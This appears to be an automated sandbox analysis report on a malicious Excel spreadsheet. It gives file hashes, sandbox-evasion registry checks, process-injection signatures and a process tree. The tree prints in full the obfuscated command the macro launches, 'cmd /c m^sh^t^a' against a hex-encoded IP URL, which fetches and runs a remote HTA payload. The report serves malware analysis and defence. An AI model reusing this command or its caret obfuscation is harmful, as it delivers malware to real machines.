Analysis
-
max time kernel
130s -
max time network
133s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
19-01-2022 12:55
Behavioral task
behavioral1
Sample
c48a780e4664704fea5ddb053288a405a134644cd21cf1b2a21050df56d28d94.xls
Resource
win10-en-20211208
General
-
Target
c48a780e4664704fea5ddb053288a405a134644cd21cf1b2a21050df56d28d94.xls
-
Size
142KB
-
MD5
8d6b43ca03cf1e4d675a523c4b06e214
-
SHA1
6cdde32cd5ce069e00c952575714e66c55f091cc
-
SHA256
c48a780e4664704fea5ddb053288a405a134644cd21cf1b2a21050df56d28d94
-
SHA512
600dc0d8cd18517e49c8319c8a7e9feb8cdd6354d80ff1c0b7e99ccdbd9fc3651b30c07448792fd7b52ec877068d72a2c664c2e79ca8fcdfd542ff6f1c8f7418
Malware Config
Extracted
http://0xb907d607/fer/fer.html
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
cmd.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2020 3716 cmd.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
mshta.exeflow pid process 44 1868 mshta.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 3716 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 13 IoCs
Processes:
EXCEL.EXEpid process 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE 3716 EXCEL.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
EXCEL.EXEcmd.exedescription pid process target process PID 3716 wrote to memory of 2156 3716 EXCEL.EXE splwow64.exe PID 3716 wrote to memory of 2156 3716 EXCEL.EXE splwow64.exe PID 3716 wrote to memory of 2020 3716 EXCEL.EXE cmd.exe PID 3716 wrote to memory of 2020 3716 EXCEL.EXE cmd.exe PID 2020 wrote to memory of 1868 2020 cmd.exe mshta.exe PID 2020 wrote to memory of 1868 2020 cmd.exe mshta.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\c48a780e4664704fea5ddb053288a405a134644cd21cf1b2a21050df56d28d94.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
C:\Windows\SYSTEM32\cmd.execmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fer.html2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\mshta.exemshta http://0xb907d607/fer/fer.html3⤵
- Blocklisted process makes network request
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/3716-115-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmpFilesize
64KB
-
memory/3716-116-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmpFilesize
64KB
-
memory/3716-117-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmpFilesize
64KB
-
memory/3716-118-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmpFilesize
64KB
-
memory/3716-119-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmpFilesize
64KB
-
memory/3716-128-0x00007FFF786A0000-0x00007FFF786B0000-memory.dmpFilesize
64KB
-
memory/3716-129-0x00007FFF786A0000-0x00007FFF786B0000-memory.dmpFilesize
64KB
-
memory/3716-513-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmpFilesize
64KB
-
memory/3716-514-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmpFilesize
64KB
-
memory/3716-515-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmpFilesize
64KB
-
memory/3716-516-0x00007FFF7B1F0000-0x00007FFF7B200000-memory.dmpFilesize
64KB